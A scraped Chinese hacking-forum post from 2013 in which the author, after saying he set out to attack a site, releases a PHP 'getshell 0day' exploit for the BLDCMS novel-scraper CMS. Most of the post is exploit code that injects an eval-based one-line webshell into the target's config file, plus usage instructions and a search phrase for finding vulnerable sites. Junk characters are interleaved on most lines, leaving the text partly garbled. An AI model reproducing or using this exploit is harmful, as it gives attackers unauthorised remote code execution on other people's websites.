之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
6 Z* ]2 M% O1 e5 F% `
, Z4 ]/ h/ ]2 W" R: [+ z7 ~* R2 ~
5 Q4 b* z [/ I* k( c话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 / f/ ^6 a2 `7 X( `9 W0 `% l
& Q! [6 i8 I6 J( V
既然都有人发了 我就把我之前写好的EXP放出来吧
$ l7 ~7 T/ i2 ~$ s" C $ U/ |+ ` y7 l1 e$ z9 t
view source print?01.php;">- ~0 l8 U/ \/ t2 ]% l3 x# q9 a+ a
02.<!--?php3 m3 F6 P9 `6 f" S* g
03.echo "-------------------------------------------------------------------
, G& h! Y5 B, G4 R2 _3 W) G04. ) N B6 T8 @; c, u3 c b
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
9 N1 T1 u( _" ]06. ) r8 o4 i/ F! N
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun8 j ~& _: F5 | T
08. 8 y8 w7 t4 ^$ y+ B3 S- `5 d
09.QQ:981009941\r\n 2013.3.21\r\n
0 v0 k3 j+ i! U+ w8 c8 z10. 7 X* \( d; @- b' i
11.
. ]" M2 P$ a+ Q, c) _6 |) c& M7 M# t12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
* i# d. E" Y. [; V5 w0 Q1 B5 }13. + l1 A3 }# {& O) R* l- v
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------0 u3 k" n$ O/ Y+ i% D* A6 y- X0 O
15. # e2 N3 k9 k' Y# \- E1 E& W( ^
16.--------------------------------------------------------------------\r\n";3 J' y) S1 H1 _, T5 w! e* x
17.$url=$argv[1];+ e' v& u7 O9 K6 ^- _5 Y
18.$dir=$argv[2];" ^# d( c9 r) C
19.$pass=$argv[3];1 U* I. Q1 r# J2 z
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';5 o9 e' }3 _! b# t+ X7 _& r9 B P
21.if (emptyempty($pass)||emptyempty($url))
' S2 Y, N7 T. Q+ f/ I22.{exit("请输入参数");}
& Z# u- A6 u% I. y1 b/ T5 a23.else
. H3 _% G1 T q, d' ~8 q1 V24.{. a& l8 ~. D0 y
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
# ~" L' K4 W- O3 `* k- k26.
: w# F( |, k4 X2 E27.al;
D o# }0 _( G28.$length = strlen($fuckdata);. P H. G0 x( W* W# L
29.function getshell($url,$pass)
# { |( G! ?7 `& Z( s& b" ~30.{
, N: D! ^5 z3 n% I31.global $url,$dir,$pass,$eval,$length,$fuckdata;5 |/ F$ y0 B9 ^; \# H( o# g0 X
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
$ b6 l- M9 Q* x5 H7 r- d& p33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
. H% X4 W5 O& a; x% k2 {; g/ d, B! Q34.$header .= "User-Agent: MSIE\r\n";
) p6 s- @8 K9 w9 y2 k Q1 ?& _3 S# t& Q35.$header .= "Host:".$url."\r\n";" ?9 v( Q+ S) K% q. H" z) [
36.$header .= "Content-Length: ".$length."\r\n";
r( [/ F, ^6 w5 t37.$header .= "Connection: Close\r\n";
8 q/ ~# C5 } k. |9 M6 x38.$header .="\r\n";
9 |! t; B v; V5 c39.$header .= $fuckdata."\r\n\r\n";% v* ?4 I' J1 N3 F# \1 C$ G7 y
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
& \0 f" y, H6 O# t- G2 j41.if (!$fp)
$ L7 v- N& r. D7 B2 n, Q42.{
+ g4 l7 |( T: d# Y* H4 }% Q43.exit ("利用失败:请检查指定目标是否能正常打开");. t0 f( |! V( c: C
44.}; d3 d$ ~& j7 H6 U3 I/ M
45.else{ if (!fputs($fp,$header))8 v! {5 R8 V4 K
46.{exit ("利用失败");}
% }( t& Y! O6 `$ u+ F47.else
4 V! M" [6 K8 L2 P, t$ m- G5 L* M48.{% l8 e' e1 |, @6 h
49.$receive = '';
3 [4 h" ^/ p1 G, {3 W$ w" } `50.while (!feof($fp)) {
2 M* J8 S+ t- x) @( @51.$receive .= @fgets($fp, 1000);
. T% H1 y) j; Z52.}/ [1 w( C4 F0 e F# w+ K7 U
53.@fclose($fp);
0 E3 X' L. `7 K9 M0 g2 V54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
$ Z* R! a1 f$ B( t55. ' J. |/ q* i5 S
56.GPC是否=off)";% u; Z$ k) w' o' N* `1 ?/ h+ ]0 ] l, X
57.}}
4 c& P" S1 u. j5 j& V9 u& l0 |58.}
4 G& J2 C' U. V, W$ i" P59.}
& _+ ] r9 _5 I60.getshell($url,$pass);5 }' l7 |2 [4 }% U+ Z# |
61.?-->
1 y) X! y' ]- k3 W+ Q) q8 S6 X
. C8 [7 c7 y( \
3 c/ e G, C7 r% ~. ^& u I 2 F8 V8 c$ I" J4 Q. j2 Y N
by 数据流( }5 L) V% K v
|
发表于 2013-3-26 20:49:10
收藏
支持
反对